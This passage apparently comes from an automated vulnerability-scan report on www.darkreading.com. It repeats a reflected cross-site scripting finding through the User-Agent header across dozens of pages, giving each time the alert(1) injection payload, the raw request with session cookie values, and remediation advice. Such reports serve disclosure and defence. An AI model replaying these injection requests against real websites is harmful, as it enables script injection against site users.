Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/09/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d336e"-alert(1)-"f79a23192d2 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6234"-alert(1)-"7e048de364d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/10/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c6234"-alert(1)-"7e048de364d Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92468"-alert(1)-"66b3ff3bc26 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/11/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)92468"-alert(1)-"66b3ff3bc26 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57276"-alert(1)-"f26e3213283 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/12/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)57276"-alert(1)-"f26e3213283 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3133"-alert(1)-"c617777e0de was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/01/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b3133"-alert(1)-"c617777e0de Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b07c7"-alert(1)-"cf1435d5d5e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/02/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b07c7"-alert(1)-"cf1435d5d5e Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86e07"-alert(1)-"e37f836bc3d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/03/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)86e07"-alert(1)-"e37f836bc3d Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab11e"-alert(1)-"effa8005299 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/04/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ab11e"-alert(1)-"effa8005299 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10d18"-alert(1)-"106db11963f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/05/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)10d18"-alert(1)-"106db11963f Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5075d"-alert(1)-"173f9be2d83 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/06/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)5075d"-alert(1)-"173f9be2d83 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa020"-alert(1)-"3c860a1776e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/07/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)aa020"-alert(1)-"3c860a1776e Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e434"-alert(1)-"67320eb9904 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/08/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7e434"-alert(1)-"67320eb9904 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62549"-alert(1)-"3d057cd3836 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/09/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)62549"-alert(1)-"3d057cd3836 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f85f9"-alert(1)-"248462b7f4c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/10/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f85f9"-alert(1)-"248462b7f4c Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cf0f"-alert(1)-"739b215f8fc was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/11/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1cf0f"-alert(1)-"739b215f8fc Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59fe9"-alert(1)-"fb99c24516a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/12/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)59fe9"-alert(1)-"fb99c24516a Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c920"-alert(1)-"32acd697e01 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/cs-island/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8c920"-alert(1)-"32acd697e01 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6a29"-alert(1)-"9e344aef5f5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/dark-dominion/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d6a29"-alert(1)-"9e344aef5f5 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40a2b"-alert(1)-"da272796845 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/evil-bytes/index.html HTTP/1.1 Host: www.darkreading.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.1040a2b"-alert(1)-"da272796845 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54a09"-alert(1)-"ef2a76cf5c4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/evil_bytes/index.html?subSection=evil_bytes HTTP/1.1 Host: www.darkreading.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.1054a09"-alert(1)-"ef2a76cf5c4 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f570"-alert(1)-"95b61672bba was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/hacked-off/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4f570"-alert(1)-"95b61672bba Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34f37"-alert(1)-"7da1c50bc32 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/in-search-of-malware/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)34f37"-alert(1)-"7da1c50bc32 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8050"-alert(1)-"e4ac5bc580f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/security-views/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f8050"-alert(1)-"e4ac5bc580f Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1438e"-alert(1)-"15e2bca155c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/sophoslabs-insights/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1438e"-alert(1)-"15e2bca155c Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8336"-alert(1)-"fc9d06058a8 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/calendar.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c8336"-alert(1)-"fc9d06058a8 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa51a"-alert(1)-"c074a77ad2c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsletters/subscribe.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fa51a"-alert(1)-"c074a77ad2c Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89bd7"-alert(1)-"08a9be8278b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
